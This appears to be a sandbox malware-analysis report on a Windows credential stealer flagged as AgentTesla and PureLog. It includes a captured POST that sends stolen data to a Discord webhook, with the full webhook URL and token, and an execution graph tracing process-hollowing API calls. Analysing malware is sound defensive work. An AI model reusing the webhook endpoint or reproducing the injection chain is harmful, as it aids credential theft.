                                                                      2024-03-28 12:58:57 UTC362OUTPOST /api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----------9f8a08985d6743459b05911f9073b2ab
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                      Host: discord.com
                                                                      Content-Length: 429
                                                                      Expect: 100-continue
                                                                      2024-03-28 12:58:57 UTC25INHTTP/1.1 100 Continue
                                                                      2024-03-28 12:58:57 UTC429OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 66 38 61 30 38 39 38 35 64 36 37 34 33 34 35 39 62 30 35 39 31 31 66 39 30 37 33 62 32 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 73 65 72 6e 61 6d 65 22 0d 0a 0d 0a 6a 6f 6e 65 73 2f 35 32 38 31 31 30 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 66 38 61 30 38 39 38 35 64 36 37 34 33 34 35 39 62 30 35 39 31 31 66 39 30 37 33 62 32 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 6f 6e 74 65 6e 74 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6e 74 61 63 74 73 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 38 2f 32 30 32 34 20 31 35 3a 30 38 3a
                                                                      Data Ascii: ------------9f8a08985d6743459b05911f9073b2abContent-Disposition: form-data; name="username"user/528110------------9f8a08985d6743459b05911f9073b2abContent-Disposition: form-data; name="content"New Contacts Recovered!Time: 03/28/2024 15:08:
                                                                      2024-03-28 12:58:57 UTC1369INHTTP/1.1 204 No Content
                                                                      Date: Thu, 28 Mar 2024 12:58:57 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      set-cookie: __dcfduid=f0600b96ed0211ee9bd86e2dec408269; Expires=Tue, 27-Mar-2029 12:58:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                      x-ratelimit-limit: 5
                                                                      x-ratelimit-remaining: 4
                                                                      x-ratelimit-reset: 1711630738
                                                                      x-ratelimit-reset-after: 1
                                                                      via: 1.1 google
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OurxZZVjgB8WPoD0Slk5N1nXiRjENhT6uBdC%2BAZ0Dxdkn6H2jtk5uUS%2FuTmUIeq016XeCiGYhUcCRD%2FpaAm%2BByNN6hnycS1nHVL6ZK7qMH5jXHaZDP0glAXqXPR7"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                      Set-Cookie: __sdcfduid=f0600b96ed0211ee9bd86e2dec408269840ea4f2841ab689c0b71f7c4665819e6b62a8eebfc35ed4aa7a710040a1b622; Expires=Tue, 27-Mar-2029 12:58:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                      Set-Cookie: __cfruid=f5dd942da8c35e95aa4d01038d9734a1a2e00fb1-1711630737; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                      Set-Cookie: _
                                                                      2024-03-28 12:58:57 UTC198INData Raw: 63 66 75 76 69 64 3d 7a 79 4f 5f 62 58 4e 63 6b 78 6b 54 4a 53 53 75 63 33 47 47 41 49 6d 67 45 2e 31 58 56 47 33 58 77 79 74 73 64 50 33 6f 50 58 51 2d 31 37 31 31 36 33 30 37 33 37 33 37 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 36 62 37 63 62 36 62 36 65 36 64 32 30 39 63 2d 49 41 44 0d 0a 0d 0a
                                                                      Data Ascii: cfuvid=zyO_bXNckxkTJSSuc3GGAImgE.1XVG3XwytsdP3oPXQ-1711630737374-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 86b7cb6b6e6d209c-IAD


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:13:58:52
                                                                      Start date:28/03/2024
                                                                      Path:C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe"
                                                                      Imagebase:0x960000
                                                                      File size:2'987'520 bytes
                                                                      MD5 hash:73F2AA0989D9FCB98763FBB461422F9F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1650117594.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1647338287.00000000055E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1641702888.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1641702888.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:13:58:53
                                                                      Start date:28/03/2024
                                                                      Path:C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe"
                                                                      Imagebase:0x500000
                                                                      File size:2'987'520 bytes
                                                                      MD5 hash:73F2AA0989D9FCB98763FBB461422F9F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:13.9%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:336
                                                                        Total number of Limit Nodes:8
                                                                        execution_graph 51393 5c0e7c0 51394 5c0e804 VirtualAlloc 51393->51394 51396 5c0e871 51394->51396 51785 5c0dce0 51786 5c0dd39 51785->51786 51789 5c0e270 51786->51789 51787 5c0dd6e 51790 5c0e29d 51789->51790 51793 5c0e433 51790->51793 51794 5c0d0f8 51790->51794 51793->51787 51796 5c0d11f 51794->51796 51798 5c0d5f8 51796->51798 51799 5c0d641 VirtualProtect 51798->51799 51801 5c0d1dc 51799->51801 51801->51787 51822 5b4dd42 51823 5b4dd26 51822->51823 51824 5b7c900 10 API calls 51823->51824 51825 5b7c8f0 10 API calls 51823->51825 51824->51823 51825->51823 51397 5b4e4ae 51398 5b4dd26 51397->51398 51401 5b7c900 51398->51401 51409 5b7c8f0 51398->51409 51402 5b7c915 51401->51402 51417 5b7cc79 51402->51417 51421 5b7cafa 51402->51421 51425 5b7ca10 51402->51425 51429 5b7c940 51402->51429 51433 5b7c930 51402->51433 51403 5b7c92b 51403->51398 51410 5b7c915 51409->51410 51412 5b7c930 10 API calls 51410->51412 51413 5b7c940 10 API calls 51410->51413 51414 5b7ca10 10 API calls 51410->51414 51415 5b7cafa 10 API calls 51410->51415 51416 5b7cc79 10 API calls 51410->51416 51411 5b7c92b 51411->51398 51412->51411 51413->51411 51414->51411 51415->51411 51416->51411 51419 5b7c997 51417->51419 51418 5b7c9b2 51418->51403 51419->51418 51437 5b7e398 51419->51437 51423 5b7c997 51421->51423 51422 5b7c9b2 51422->51403 51423->51422 51424 5b7e398 10 API calls 51423->51424 51424->51423 51426 5b7c997 51425->51426 51427 5b7c9b2 51426->51427 51428 5b7e398 10 API calls 51426->51428 51427->51403 51428->51426 51431 5b7c96a 51429->51431 51430 5b7c9b2 51430->51403 51431->51430 51432 5b7e398 10 API calls 51431->51432 51432->51431 51435 5b7c940 51433->51435 51434 5b7c9b2 51434->51403 51435->51434 51436 5b7e398 10 API calls 51435->51436 51436->51435 51438 5b7e3bd 51437->51438 51454 5b7eb54 51438->51454 51458 5b7e4ab 51438->51458 51462 5b7e76c 51438->51462 51466 5b7ec4d 51438->51466 51470 5b7eb2e 51438->51470 51474 5b7e92e 51438->51474 51478 5b7e46e 51438->51478 51482 5b7ed4f 51438->51482 51486 5b7e9c6 51438->51486 51490 5b7e3e7 51438->51490 51494 5b7e3f8 51438->51494 51498 5b7ec9c 51438->51498 51502 5b7e71e 51438->51502 51506 5b7ecf1 51438->51506 51455 5b7e458 51454->51455 51510 5b7f210 51455->51510 51525 5b7f200 51455->51525 51459 5b7e458 51458->51459 51460 5b7f210 10 API calls 51459->51460 51461 5b7f200 10 API calls 51459->51461 51460->51459 51461->51459 51463 5b7e458 51462->51463 51464 5b7f210 10 API calls 51463->51464 51465 5b7f200 10 API calls 51463->51465 51464->51463 51465->51463 51467 5b7e458 51466->51467 51468 5b7f210 10 API calls 51467->51468 51469 5b7f200 10 API calls 51467->51469 51468->51467 51469->51467 51471 5b7e458 51470->51471 51472 5b7f210 10 API calls 51471->51472 51473 5b7f200 10 API calls 51471->51473 51472->51471 51473->51471 51475 5b7e458 51474->51475 51476 5b7f210 10 API calls 51475->51476 51477 5b7f200 10 API calls 51475->51477 51476->51475 51477->51475 51479 5b7e458 51478->51479 51479->51478 51480 5b7f210 10 API calls 51479->51480 51481 5b7f200 10 API calls 51479->51481 51480->51479 51481->51479 51483 5b7e458 51482->51483 51484 5b7f210 10 API calls 51483->51484 51485 5b7f200 10 API calls 51483->51485 51484->51483 51485->51483 51487 5b7e458 51486->51487 51488 5b7f210 10 API calls 51487->51488 51489 5b7f200 10 API calls 51487->51489 51488->51487 51489->51487 51491 5b7e42b 51490->51491 51492 5b7f210 10 API calls 51491->51492 51493 5b7f200 10 API calls 51491->51493 51492->51491 51493->51491 51495 5b7e42b 51494->51495 51496 5b7f210 10 API calls 51495->51496 51497 5b7f200 10 API calls 51495->51497 51496->51495 51497->51495 51499 5b7e458 51498->51499 51500 5b7f210 10 API calls 51499->51500 51501 5b7f200 10 API calls 51499->51501 51500->51499 51501->51499 51503 5b7e458 51502->51503 51504 5b7f210 10 API calls 51503->51504 51505 5b7f200 10 API calls 51503->51505 51504->51503 51505->51503 51507 5b7e458 51506->51507 51508 5b7f210 10 API calls 51507->51508 51509 5b7f200 10 API calls 51507->51509 51508->51507 51509->51507 51511 5b7f225 51510->51511 51512 5b7f247 51511->51512 51540 5d10825 51511->51540 51545 5d11163 51511->51545 51550 5d10683 51511->51550 51556 5d10bfc 51511->51556 51563 5d10438 51511->51563 51569 5d10219 51511->51569 51575 5d10796 51511->51575 51580 5d10a90 51511->51580 51586 5d1016d 51511->51586 51593 5d103ad 51511->51593 51599 5d1012b 51511->51599 51605 5d10186 51511->51605 51512->51455 51526 5b7f225 51525->51526 51527 5d10a90 6 API calls 51526->51527 51528 5d10796 2 API calls 51526->51528 51529 5d10219 4 API calls 51526->51529 51530 5d10438 2 API calls 51526->51530 51531 5b7f247 51526->51531 51532 5d10bfc 4 API calls 51526->51532 51533 5d10683 4 API calls 51526->51533 51534 5d11163 2 API calls 51526->51534 51535 5d10825 2 API calls 51526->51535 51536 5d10186 4 API calls 51526->51536 51537 5d1012b 2 API calls 51526->51537 51538 5d103ad 4 API calls 51526->51538 51539 5d1016d 6 API calls 51526->51539 51527->51531 51528->51531 51529->51531 51530->51531 51531->51455 51532->51531 51533->51531 51534->51531 51535->51531 51536->51531 51537->51531 51538->51531 51539->51531 51541 5d1083d 51540->51541 51611 5d116c9 51541->51611 51626 5d116d8 51541->51626 51542 5d10855 51546 5d11172 51545->51546 51697 5d14da0 51546->51697 51701 5d14d99 51546->51701 51547 5d10113 51551 5d1068d 51550->51551 51705 5d16ff0 51551->51705 51710 5d17038 51551->51710 51716 5d16fe0 51551->51716 51552 5d106e1 51557 5d10113 51556->51557 51558 5d10683 51556->51558 51560 5d16ff0 2 API calls 51558->51560 51561 5d16fe0 4 API calls 51558->51561 51562 5d17038 2 API calls 51558->51562 51559 5d106e1 51560->51559 51561->51559 51562->51559 51564 5d10d52 51563->51564 51565 5d10113 51563->51565 51741 5d170e0 51564->51741 51746 5d170d0 51564->51746 51566 5d10d7e 51566->51512 51570 5d10228 51569->51570 51760 5d16f48 51570->51760 51765 5d16f8a 51570->51765 51774 5d16f38 51570->51774 51571 5d1024b 51576 5d10d51 51575->51576 51578 5d170d0 2 API calls 51576->51578 51579 5d170e0 2 API calls 51576->51579 51577 5d10d7e 51577->51512 51578->51577 51579->51577 51581 5d10a9a 51580->51581 51583 5d16fe0 4 API calls 51581->51583 51585 5d16f8a 4 API calls 51581->51585 51780 5d16f98 51581->51780 51582 5d10aec 51582->51512 51583->51582 51585->51582 51587 5d10ab6 51586->51587 51588 5d10113 51586->51588 51590 5d16fe0 4 API calls 51587->51590 51591 5d16f98 2 API calls 51587->51591 51592 5d16f8a 4 API calls 51587->51592 51589 5d10aec 51589->51512 51590->51589 51591->51589 51592->51589 51594 5d103bc 51593->51594 51596 5d16ff0 2 API calls 51594->51596 51597 5d16fe0 4 API calls 51594->51597 51598 5d17038 2 API calls 51594->51598 51595 5d10113 51596->51595 51597->51595 51598->51595 51600 5d10113 51599->51600 51601 5d10d2b 51599->51601 51603 5d170d0 2 API calls 51601->51603 51604 5d170e0 2 API calls 51601->51604 51602 5d10d7e 51602->51512 51603->51602 51604->51602 51606 5d10195 51605->51606 51608 5d16ff0 2 API calls 51606->51608 51609 5d16fe0 4 API calls 51606->51609 51610 5d17038 2 API calls 51606->51610 51607 5d10113 51608->51607 51609->51607 51610->51607 51612 5d116ef 51611->51612 51624 5d11711 51612->51624 51641 5d11bb6 51612->51641 51645 5d11af7 51612->51645 51649 5d11d15 51612->51649 51653 5d11c12 51612->51653 51657 5d11748 51612->51657 51661 5d11b22 51612->51661 51665 5d117e0 51612->51665 51669 5d11a61 51612->51669 51673 5d11841 51612->51673 51677 5d11a1c 51612->51677 51681 5d11738 51612->51681 51685 5d117f8 51612->51685 51624->51542 51627 5d116ef 51626->51627 51628 5d11c12 2 API calls 51627->51628 51629 5d11d15 2 API calls 51627->51629 51630 5d11af7 2 API calls 51627->51630 51631 5d11bb6 2 API calls 51627->51631 51632 5d117f8 2 API calls 51627->51632 51633 5d11738 2 API calls 51627->51633 51634 5d11a1c 2 API calls 51627->51634 51635 5d11841 2 API calls 51627->51635 51636 5d11a61 2 API calls 51627->51636 51637 5d117e0 2 API calls 51627->51637 51638 5d11b22 2 API calls 51627->51638 51639 5d11711 51627->51639 51640 5d11748 2 API calls 51627->51640 51628->51639 51629->51639 51630->51639 51631->51639 51632->51639 51633->51639 51634->51639 51635->51639 51636->51639 51637->51639 51638->51639 51639->51542 51640->51639 51642 5d117c8 51641->51642 51689 5d149f0 51642->51689 51693 5d149e5 51642->51693 51646 5d117c8 51645->51646 51647 5d149f0 CreateProcessA 51646->51647 51648 5d149e5 CreateProcessA 51646->51648 51647->51646 51648->51646 51650 5d117c8 51649->51650 51651 5d149f0 CreateProcessA 51650->51651 51652 5d149e5 CreateProcessA 51650->51652 51651->51650 51652->51650 51654 5d117c8 51653->51654 51655 5d149f0 CreateProcessA 51654->51655 51656 5d149e5 CreateProcessA 51654->51656 51655->51654 51656->51654 51658 5d1177b 51657->51658 51659 5d149f0 CreateProcessA 51658->51659 51660 5d149e5 CreateProcessA 51658->51660 51659->51658 51660->51658 51662 5d117c8 51661->51662 51663 5d149f0 CreateProcessA 51662->51663 51664 5d149e5 CreateProcessA 51662->51664 51663->51662 51664->51662 51666 5d117c8 51665->51666 51667 5d149f0 CreateProcessA 51666->51667 51668 5d149e5 CreateProcessA 51666->51668 51667->51666 51668->51666 51670 5d117c8 51669->51670 51671 5d149f0 CreateProcessA 51670->51671 51672 5d149e5 CreateProcessA 51670->51672 51671->51670 51672->51670 51674 5d117c8 51673->51674 51675 5d149f0 CreateProcessA 51674->51675 51676 5d149e5 CreateProcessA 51674->51676 51675->51674 51676->51674 51678 5d117c8 51677->51678 51679 5d149f0 CreateProcessA 51678->51679 51680 5d149e5 CreateProcessA 51678->51680 51679->51678 51680->51678 51682 5d11748 51681->51682 51683 5d149f0 CreateProcessA 51682->51683 51684 5d149e5 CreateProcessA 51682->51684 51683->51682 51684->51682 51686 5d117c8 51685->51686 51686->51685 51687 5d149f0 CreateProcessA 51686->51687 51688 5d149e5 CreateProcessA 51686->51688 51687->51686 51688->51686 51691 5d14a70 CreateProcessA 51689->51691 51692 5d14c6c 51691->51692 51694 5d14a70 CreateProcessA 51693->51694 51696 5d14c6c 51694->51696 51698 5d14de9 Wow64SetThreadContext 51697->51698 51700 5d14e61 51698->51700 51700->51547 51702 5d14da0 Wow64SetThreadContext 51701->51702 51704 5d14e61 51702->51704 51704->51547 51706 5d17005 51705->51706 51725 5d156e0 51706->51725 51729 5d15698 51706->51729 51707 5d17027 51707->51552 51711 5d16ffa 51710->51711 51712 5d17043 51711->51712 51714 5d156e0 WriteProcessMemory 51711->51714 51715 5d15698 WriteProcessMemory 51711->51715 51712->51552 51713 5d17027 51713->51552 51714->51713 51715->51713 51717 5d16fe3 51716->51717 51718 5d16fa2 51716->51718 51721 5d156e0 WriteProcessMemory 51717->51721 51722 5d15698 WriteProcessMemory 51717->51722 51733 5d15420 51718->51733 51737 5d15418 51718->51737 51719 5d16fcf 51719->51552 51720 5d17027 51720->51552 51721->51720 51722->51720 51726 5d15729 WriteProcessMemory 51725->51726 51728 5d157c2 51726->51728 51728->51707 51730 5d156e0 WriteProcessMemory 51729->51730 51732 5d157c2 51730->51732 51732->51707 51734 5d15464 VirtualAllocEx 51733->51734 51736 5d154dc 51734->51736 51736->51719 51738 5d15464 VirtualAllocEx 51737->51738 51740 5d154dc 51738->51740 51740->51719 51742 5d170f5 51741->51742 51752 5d15a70 51742->51752 51756 5d15a78 51742->51756 51743 5d1710b 51743->51566 51747 5d170d3 51746->51747 51748 5d17092 51746->51748 51747->51748 51750 5d15a70 ResumeThread 51747->51750 51751 5d15a78 ResumeThread 51747->51751 51748->51566 51749 5d1710b 51749->51566 51750->51749 51751->51749 51753 5d15abc ResumeThread 51752->51753 51755 5d15b08 51753->51755 51755->51743 51757 5d15abc ResumeThread 51756->51757 51759 5d15b08 51757->51759 51759->51743 51761 5d16f5d 51760->51761 51763 5d14da0 Wow64SetThreadContext 51761->51763 51764 5d14d99 Wow64SetThreadContext 51761->51764 51762 5d16f76 51762->51571 51763->51762 51764->51762 51766 5d16f52 51765->51766 51767 5d16f93 51765->51767 51770 5d14da0 Wow64SetThreadContext 51766->51770 51771 5d14d99 Wow64SetThreadContext 51766->51771 51772 5d15420 VirtualAllocEx 51767->51772 51773 5d15418 VirtualAllocEx 51767->51773 51768 5d16f76 51768->51571 51769 5d16fcf 51769->51571 51770->51768 51771->51768 51772->51769 51773->51769 51775 5d16f3b 51774->51775 51776 5d16efa 51774->51776 51778 5d14da0 Wow64SetThreadContext 51775->51778 51779 5d14d99 Wow64SetThreadContext 51775->51779 51776->51571 51777 5d16f76 51777->51571 51778->51777 51779->51777 51781 5d16fad 51780->51781 51783 5d15420 VirtualAllocEx 51781->51783 51784 5d15418 VirtualAllocEx 51781->51784 51782 5d16fcf 51782->51582 51783->51782 51784->51782 51810 2f68238 51811 2f68252 51810->51811 51812 2f68262 51811->51812 51815 5c06cd3 51811->51815 51818 5c03a0a 51811->51818 51817 5c0d0f8 VirtualProtect 51815->51817 51816 5c001dc 51817->51816 51821 5c0d0f8 VirtualProtect 51818->51821 51819 5c0239f 51819->51818 51820 5c001dc 51819->51820 51821->51819
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                        • API String ID: 0-312445597
                                                                        • Opcode ID: 5eeb01e14625490a8ab0c1ec89c281b6e1e38068407b9237588bb6689f35e5dc
                                                                        • Instruction ID: 4cb761cbc3a916a33ab3f3675db37aa36cc75f6a9797a5cbaecfb84a242fad8b
                                                                        • Opcode Fuzzy Hash: 5eeb01e14625490a8ab0c1ec89c281b6e1e38068407b9237588bb6689f35e5dc
                                                                        • Instruction Fuzzy Hash: C0A21834A00218DFDB18DFA4C894FADB7B6BF88700F148599E516AB2A5DB71EC45CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q
                                                                        • API String ID: 0-1692521823
                                                                        • Opcode ID: 8071a7cd82892377e2ddab0ed95ce1222f5e3b1fd7ae4f22f9fbe5f2c8a86845
                                                                        • Instruction ID: b280419f3a68497af3a6ecf1f8f1848e5fcfdd88ca9246bdedbc1adaada181c2
                                                                        • Opcode Fuzzy Hash: 8071a7cd82892377e2ddab0ed95ce1222f5e3b1fd7ae4f22f9fbe5f2c8a86845
                                                                        • Instruction Fuzzy Hash: F762DA74A00218CFDB14DFA5C994FA9B7B2BF48700F1481A5E51AAB3A5DB71ED81CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                                                        • API String ID: 0-2546334966
                                                                        • Opcode ID: bb35fa65147f735f868a92aeae4e59b2eb24ce15bf618d83d91b48c588272f13
                                                                        • Instruction ID: 6551cbc3345595e65f689505ca0c3423619797997a84ae1eaaadb2ccbe49a26e
                                                                        • Opcode Fuzzy Hash: bb35fa65147f735f868a92aeae4e59b2eb24ce15bf618d83d91b48c588272f13
                                                                        • Instruction Fuzzy Hash: 1F22ED34A00218DFDB24DF64C994FADB7B2BF48700F1481A5E51AAB3A5DB71AD85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 952 5c0ebb8-5c0ebd9 953 5c0ebe0-5c0ecc7 952->953 954 5c0ebdb 952->954 956 5c0f3c9-5c0f3d6 953->956 957 5c0eccd-5c0ee0e 953->957 954->953 959 5c0f3dc-5c0f3f1 956->959 1001 5c0f392-5c0f3bc 957->1001 1002 5c0ee14-5c0ee6f 957->1002 960 5c0faf7-5c0fb00 959->960 962 5c0fb06-5c0fb1d 960->962 963 5c0f3ff-5c0f409 960->963 964 5c0f410-5c0f504 963->964 965 5c0f40b 963->965 984 5c0f506-5c0f512 964->984 985 5c0f52e 964->985 965->964 987 5c0f514-5c0f51a 984->987 988 5c0f51c-5c0f522 984->988 986 5c0f534-5c0f554 985->986 992 5c0f5b4-5c0f634 986->992 993 5c0f556-5c0f5af 986->993 990 5c0f52c 987->990 988->990 990->986 1015 5c0f636-5c0f689 992->1015 1016 5c0f68b-5c0f6ce 992->1016 1006 5c0faf4 993->1006 1012 5c0f3c6 1001->1012 1013 5c0f3be 1001->1013 1009 5c0ee71 1002->1009 1010 5c0ee74-5c0ee7f 1002->1010 1006->960 1009->1010 1014 5c0f2a7-5c0f2ad 1010->1014 1012->956 1013->1012 1017 5c0f2b3-5c0f32f call 5c0cbc8 1014->1017 1018 5c0ee84-5c0eea2 1014->1018 1037 5c0f6d9-5c0f6e2 1015->1037 1016->1037 1059 5c0f37c-5c0f382 1017->1059 1019 5c0eea4-5c0eea8 1018->1019 1020 5c0eef9-5c0ef0e 1018->1020 1019->1020 1025 5c0eeaa-5c0eeb5 1019->1025 1023 5c0ef10 1020->1023 1024 5c0ef15-5c0ef2b 1020->1024 1023->1024 1028 5c0ef32-5c0ef49 1024->1028 1029 5c0ef2d 1024->1029 1030 5c0eeeb-5c0eef1 1025->1030 1032 5c0ef50-5c0ef66 1028->1032 1033 5c0ef4b 1028->1033 1029->1028 1034 5c0eef3-5c0eef4 1030->1034 1035 5c0eeb7-5c0eebb 1030->1035 1040 5c0ef68 1032->1040 1041 5c0ef6d-5c0ef74 1032->1041 1033->1032 1043 5c0ef77-5c0efe2 1034->1043 1038 5c0eec1-5c0eed9 1035->1038 1039 5c0eebd 1035->1039 1045 5c0f742-5c0f751 1037->1045 1046 5c0eee0-5c0eee8 1038->1046 1047 5c0eedb 1038->1047 1039->1038 1040->1041 1041->1043 1048 5c0efe4-5c0eff0 1043->1048 1049 5c0eff6-5c0f1ab 1043->1049 1051 5c0f753-5c0f7db 1045->1051 1052 5c0f6e4-5c0f70c 1045->1052 1046->1030 1047->1046 1048->1049 1057 5c0f1ad-5c0f1b1 1049->1057 1058 5c0f20f-5c0f224 1049->1058 1089 5c0f954-5c0f960 1051->1089 1055 5c0f713-5c0f73c 1052->1055 1056 5c0f70e 1052->1056 1055->1045 1056->1055 1057->1058 1061 5c0f1b3-5c0f1c2 1057->1061 1065 5c0f226 1058->1065 1066 5c0f22b-5c0f24c 1058->1066 1063 5c0f331-5c0f379 call 5c0d078 * 2 1059->1063 1064 5c0f384-5c0f38a 1059->1064 1068 5c0f201-5c0f207 1061->1068 1063->1059 1064->1001 1065->1066 1070 5c0f253-5c0f272 1066->1070 1071 5c0f24e 1066->1071 1075 5c0f1c4-5c0f1c8 1068->1075 1076 5c0f209-5c0f20a 1068->1076 1072 5c0f274 1070->1072 1073 5c0f279-5c0f299 1070->1073 1071->1070 